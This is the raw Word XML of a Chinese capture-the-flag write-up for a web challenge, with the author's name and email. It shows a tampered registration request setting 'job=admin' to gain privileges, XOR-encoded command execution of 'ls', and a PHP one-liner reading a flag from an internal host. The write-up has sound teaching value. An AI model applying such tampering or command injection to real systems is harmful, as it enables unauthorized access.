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14460" w14:textId="2DBC4E22" w:rsidR="00E2294C" w:rsidRDefault="009E5828" w:rsidP="009E5828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382B718C" w14:textId="25F373D8" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828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李承达</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="006E49CD">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>3433778745@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41937150" w14:textId="24419B0F" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web-</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5828">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掉进阿帕奇的工资</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A0BA8" w14:textId="0F50BBA5" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE50014" w14:textId="7F884311" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:r w:rsidRPr="009E5828">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2981D0CC" wp14:editId="11FC6453">
            <wp:extent cx="5274310" cy="730250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1068392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92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C9BA" w14:textId="4194498E" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现被隐藏的job内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373EF85" w14:textId="035C5EE5" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后抓包设置job为admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C1A63" w14:textId="332E64F3" w:rsidR="009E5828" w:rsidRDefault="00000000" w:rsidP="009E5828">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="009E5828" w:rsidRPr="006E49CD">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>username=akyoi&amp;password=akyoi&amp;repassword=akyoi&amp;mail=1111111111@qq.com&amp;phone=114514&amp;question=1&amp;answer=1111&amp;job=admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F61C53B" w14:textId="5EAD311B" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:r w:rsidRPr="009E5828">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3541D0D8" wp14:editId="30CAFBEE">
            <wp:extent cx="5274310" cy="6209665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="680554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54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872" w14:textId="15DE73E1" w:rsidR="009E5828" w:rsidRDefault="009E5828" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230435C" w14:textId="75A58F5F" w:rsidR="00C134B9" w:rsidRDefault="00C134B9" w:rsidP="009E5828">
      <w:r w:rsidRPr="00C134B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B7A24FF" wp14:editId="3D16003A">
            <wp:extent cx="5274310" cy="2564765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="2045394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4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7218" w14:textId="77777777" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828"/>
    <w:p w14:paraId="039B8F3B" w14:textId="77777777" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828"/>
    <w:p w14:paraId="022F9117" w14:textId="4EE947C9" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r w:rsidRPr="004023F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6673CAC0" wp14:editId="033614B3">
            <wp:extent cx="2857899" cy="3696216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73297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4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4DB2" w14:textId="569C6B31" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果是5，经过别的数据的猜测应该是异或了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41177AAF" w14:textId="2FA754C9" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接通过异或搓个ls，直接</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给运行</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426C72CD" w14:textId="04C1F764" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r w:rsidRPr="004023F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203C65DC" wp14:editId="1BE8DC87">
            <wp:extent cx="5274310" cy="1553210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="738030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0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A4CE" w14:textId="0D43ED25" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C753A73" w14:textId="53DD72F5" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r w:rsidRPr="004023F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718FFCF0" wp14:editId="3BE77E85">
            <wp:extent cx="2476846" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="466847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47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3A4D" w14:textId="77777777" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828"/>
    <w:p w14:paraId="790352FC" w14:textId="656DB96C" w:rsidR="004023F8" w:rsidRDefault="004023F8" w:rsidP="009E5828">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么flag就应该在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secret.host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2CF62" w14:textId="77777777" w:rsidR="00E15CFE" w:rsidRDefault="00E15CFE" w:rsidP="00E15CFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r "echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>('http://secret.host/flag');"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D16DC" w14:textId="1B7E461A" w:rsidR="00E15CFE" w:rsidRPr="009E5828" w:rsidRDefault="00E15CFE" w:rsidP="009E5828">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或以下执行读取就能拿到flag了。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E15CFE" w:rsidRPr="009E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EDDAF" w14:textId="77777777" w:rsidR="00C934E6" w:rsidRDefault="00C934E6" w:rsidP="009E5828">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="206515C8" w14:textId="77777777" w:rsidR="00C934E6" w:rsidRDefault="00C934E6" w:rsidP="009E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EC896" w14:textId="77777777" w:rsidR="00C934E6" w:rsidRDefault="00C934E6" w:rsidP="009E5828">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A6E75B5" w14:textId="77777777" w:rsidR="00C934E6" w:rsidRDefault="00C934E6" w:rsidP="009E5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8D"/>
    <w:rsid w:val="004023F8"/>
    <w:rsid w:val="00694F0B"/>
    <w:rsid w:val="006D0F12"/>
    <w:rsid w:val="0098188D"/>
    <w:rsid w:val="009B7833"/>
    <w:rsid w:val="009E5828"/>
    <w:rsid w:val="00C134B9"/>
    <w:rsid w:val="00C27707"/>
    <w:rsid w:val="00C934E6"/>
    <w:rsid w:val="00E15CFE"/>
    <w:rsid w:val="00E17D9F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8CE19"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{81E71D80-83B0-4CBD-8AB8-5B9F55BB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5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8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582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E582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582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E58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=akyoi&amp;password=akyoi&amp;repassword=akyoi&amp;mail=1111111111@qq.com&amp;phone=114514&amp;question=1&amp;answer=1111&amp;job=admin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33778745@qq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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-21T06:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-22T09:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>